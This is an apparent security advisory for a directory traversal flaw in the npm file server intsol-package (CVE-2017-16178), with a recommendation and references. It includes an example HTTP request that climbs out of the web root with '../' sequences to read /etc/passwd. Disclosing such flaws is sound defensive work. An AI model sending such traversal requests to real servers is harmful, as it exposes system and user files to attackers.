GHSA-23wc-v4mf-x7v4
Dashboard / Vulnerabilities / GHSA-23wc-v4mf-x7v4
Summary: Directory Traversal in intsol-package
Details: `intsol-package` is a file server. `intsol-package` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing "../" in the url. **Example Request:** ```http GET /../../../../../../../../../../etc/passwd HTTP/1.1 host:localhost ``` and the server's Response ```http HTTP/1.1 200 OK Date: Thu, 04 May 2017 23:59:18 GMT Connection: keep-alive Transfer-Encoding: chunked {contents of /etc/passwd} ``` ## Recommendation No patch is available for this vulnerability. It is recommended that the package is only used for local development, and if the functionality is needed for production, a different package is used instead.
References: https://nvd.nist.gov/vuln/detail/CVE-2017-16178, https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/intsol-package, https://github.com/advisories/GHSA-23wc-v4mf-x7v4, https://www.npmjs.com/advisories/461
Affected packages
Package
Name: intsol-package
Purl: pkg:npm/intsol-package
Affected ranges
Type: SEMVER
Events:
